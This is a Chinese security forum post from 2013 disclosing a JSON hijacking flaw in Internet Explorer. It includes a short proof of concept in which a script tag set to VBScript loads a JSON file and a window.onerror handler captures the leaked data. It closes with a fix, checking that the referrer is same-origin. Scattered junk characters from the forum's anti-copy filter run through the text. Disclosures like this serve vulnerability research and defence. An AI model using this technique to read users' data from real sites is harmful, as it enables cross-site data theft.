找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2104|回复: 0
打印 上一主题 下一主题

IE通用JSON劫持漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2013-2-23 11:33:57 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
简要描述:. I9 J: A# Y6 T6 z

. T2 r4 }! ~7 C. f: }由于某些资源容器对数据处理不当导致json劫持漏洞.. g- h5 W1 T2 o2 q! D7 i  q
详细说明:: X0 t4 u- l$ q- E: t
由于ie支持vbscript,所以script元素可以指定成vbscript语言:2 I! R. V  U% T- w3 C8 w
<script language=vbscript></script>
, j7 b: ^8 z/ _2 J. u : Q4 \0 s/ O5 m' _7 B' `: H
当但我们指定的是一个js格式的文件是将会发现一个异常,这使我们通过捕获这个异常的信息来获得部分json数据.- P$ d, J0 d; K) M9 E
漏洞证明:
, a2 M$ }" M3 S0 r<script>
, C+ H4 C9 f5 E9 d" h2 Uwindow.onerror=function(_){
% u# q4 N8 T5 u0 g+ z& Oalert(_)
6 e2 W% ]+ s& g1 L" G0 e/ o; o5 \- W+ y}3 k( ?# T: Z- d  M3 v
</script>
- ?1 U" W: E# C; k5 N<script language=vbscript src=1.json></script>
% R. g1 Q* Q5 W 3 d8 Y' {( U+ p# ]1 n/ K

1 u9 n7 E( M; R" r1.json:7 U4 ?  c% K* e" _
[{"name":"sogili","age":19}]; V5 {9 {% S% g
修复方案:0 ?# p  k( K) V: s8 v0 ]
网站业务对于这个问题可以通过验证referrer是否为同源来防御
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表